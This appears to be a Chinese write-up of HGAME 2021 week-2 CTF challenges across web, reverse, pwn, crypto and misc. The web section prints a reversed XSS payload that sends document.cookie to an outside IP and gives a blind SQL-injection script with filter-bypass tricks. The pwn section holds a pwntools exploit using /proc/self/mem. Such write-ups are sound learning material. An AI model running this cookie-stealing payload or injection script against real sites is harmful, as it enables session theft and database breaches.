-
-
[原创] 杭电hgame2021 week2 writeup
-
2021-5-27 14:06
-
杭电hgame2021 week2
web
LazyDogR4U
www.zip可获得源码,分析一下php就行
1 | submit=getflag&_SESSESSIONSION[username]=admin |
Post to zuckonit
xss,写个爆破md5的脚本,在服务器搭个接收cookie的环境
xss的payload
1 | >;eikooc.tnemucod+'=eikooc?php.xedni/271.621.232.94//'=onitacol.tnemucod=rorreno x=crs gmi< |
200OK!!
sql盲注,根据status字段来回显,采取一个一个字符爆破的方式,select from where需要大小写绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | import requestsimport stringimport res = requests.session()url = 'https://200ok.liki.link/server.php'ans = ''dict = string.ascii_letters+string.digits+string.punctuationfor i in range(1,60): print(i) for j in dict: #爆库名 #payload = '''1'/**/or/**/ord(substr(database(),{},1))=ord('{}')#'''.format(i,chr(ord(j))) #爆表名 #payload = '''1'/**/or/**/ord(substr((SELEct/**/TABle_name/**/FRom/**/INFORMAtion_SCHEma.TABles/**/WHere/**/TABle_SCHEma=database()/**/LIMiT/**/0,1),{},1))=ord('{}')#'''.format(i,chr(ord(j))) #爆列名 #payload = '''1'/**/or/**/ord(substr((SELEct/**/Column_name/**/FRom/**/INFORMAtion_SCHEma.columns/**/WHere/**/TABle_NAMe='f1111111144444444444g'/**/LIMiT/**/0,1),{},1))=ord('{}')#'''.format(i,chr(ord(j))) #爆flag #payload = '''1'/**/or/**/ord(substr((SELEct/**/ffffff14gggggg/**/FRom/**/week2sqli.f1111111144444444444g/**/LIMiT/**/0,1),{},1))=ord('{}')#'''.format(i,chr(ord(j))) hd = { 'Status': payload } ra = s.get(url=url,headers=hd).text #print(j) #print(hd) if 'HTTP 200 OK' in ra: #print(ra) print(j) ans += j print(ans) break |
liki的生日礼物
条件竞争,抓个买一台的包,然后多线程重复发包就行
RE
ezAPK
一个标准的AESCBC加密,密文和密钥在解压缩出来的strings文档里,密钥的md5作为IV,然后找个在线网站解即可
helloRe2
第一个password比较简单,把比较的字符串提取出来就行
第二个password有个创建子进程的操作,这时候我们可以先启动程序,输入第一个password,然后在等待password2输入的时候attach上去,即可绕过
然后password2就是调用了windowsAPI的一个AESCBC加密,调试拿到密钥和IV,在线网站就可以解
fake_debugger beta
nc连上去,根据回显,就是个异或,一个一个字符弄出flag就行
pwn
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | from pwn import *context.arch = "amd64"context.log_level = 'debug'sh = remote('159.75.104.107',30398)#sh = process('./shop')sh.recvuntil('>> ')sh.sendline('2')sh.recvuntil('>> ')sh.sendline('1')sh.recvuntil('>>')payload ='/proc/self/maps'sh.sendline(payload)r=sh.recvuntil(">> ").splitlines()print(r)find=''for i in r: if b'shop' in i and b'r--p' in i: find=i breakprint (find)elfbase=int(find[25:37],16)print(hex(elfbase))sh.sendline('3')sh.recvuntil('>> ')sh.sendline('111111111111111111111111111')sh.recvuntil('>> ')sh.sendline('3')sh.recvuntil('>> ')sh.sendline('1')sh.recvuntil('>> ')sh.sendline('/proc/self/mem')sh.recv()sh.send(str(elfbase+8963))sh.recv()'''sh.send(p64(8))sh.recv()sh.send(p64(0xaaaaaaaa))sh.recvuntil('>> ')sh.send('1')sh.recvuntil('>> ')sh.send('2')sh.recvuntil('>> ')sh.send('11111111111111111111111111')sh.recvuntil('>> ')sh.send('flag')sh.recvuntil('>> ')'''sh.interactive() |
the_shop_of_cosmos
涉及到proc/self/maps和proc/self/mem的知识,首先maps可以输出当前文件加载的基地址,然后mem可以根据基地址来修改内存
还有就是输入购买数量的时候有个漏洞,当你输入的数字足够大,那么不仅不减钱,还会给你加钱
exp就不贴了,较简单
Crypto
signin
涉及到逆元的知识,还有费马小定理
1 2 3 4 5 6 7 8 9 10 11 | from gmpy2 import *import gmpy2 as gpimport libnuma = 120564833131633739158549093373383030645182202806635769940195284023469961424430923715818093121085879348486463281230726872340657095109768577902440918006603617292966510139101925420092009141992297880055417691248727683982726247023493718983115997089469688231746849686247739418658852264067119018204494137801699628029p = 148140300958875725110463571601905200234821194378794516477263427461757925343914688226737140798026085300393433907134398619032741580554160606218907137988428324426186509706800792611343514541678289427961521540035354172625978137607303224840667034663267838925533542620638127405243015959966081896809444573527022309249c = 68440055982359010847898371404412732634348351726170164279294474616113724074780415334776297201043620092127606983656166275101316284528506702011968422243891906577121609117923786504777856703297008749336097935284178407297998562145215797433785929150838433234255425306556109520390062565249629009857440054617892617632ina = gp.invert(a,p)m = c * ina % pprint(bytes.fromhex(hex(m)[2:])) |
gcd or more?
基本RSA
WhitegiveRSA
白给RSA
The Password
这题相当于解六十四元异或方程组,可以用矩阵的知识解,这里我用的z3解
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | from z3 import *solver = Solver()flag = [BitVec('flag%d' % i,8) for i in range(64)]rflag = [0 for i in range(64)]lflag = [0 for i in range(64)]for i in range(64): if(i<56): rflag[i] = flag[i+8] else: rflag[i] = flag[i-56]for i in range(64): if(i<48): lflag[i] = flag[16+i] else: lflag[i] = flag[i-48]value = 8020289479524135048 ^ 4092084344173014value = '{:064b}'.format(value)for i in range(64): solver.add(flag[i] ^ rflag[i] ^ lflag[i] == int(value[63-i],2))if solver.check() == sat: model = solver.model() for i in range(64): print(model[flag[i]].as_long().real,end = '')else: print("unsat") |
因为我这里把最右边当作第一位,所以输出的数据要倒序,最后转成十六进制,每两位就是一个字符,把七组数据代进脚本,解出后拼在一起就是flag
misc
Tools
这题就是教了各种隐写工具,根据压缩包的名字就可以找到对应的工具,解套娃就行
Telegraph:1601 6639 3459 3134 0892
音频隐写
中间有一段摩斯电码,长波为_,短波为.
解出来就是flag
Hallucigenia
用StegSolve可以得到一张二维码,扫描后是一串base64,先解码,再逆序,再转图片,最后翻转图片就可以得到flag
DNS
流量分析
wireshark打开,可以看到flag.hgame2021.cf这个网站,试着访问,F12可以看到提示SPF
1 | nslookup -type=txt flag.hgame2021.cf |
即可得到flag
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2021-6-15 20:00
被77pray编辑
,原因:
Isweng
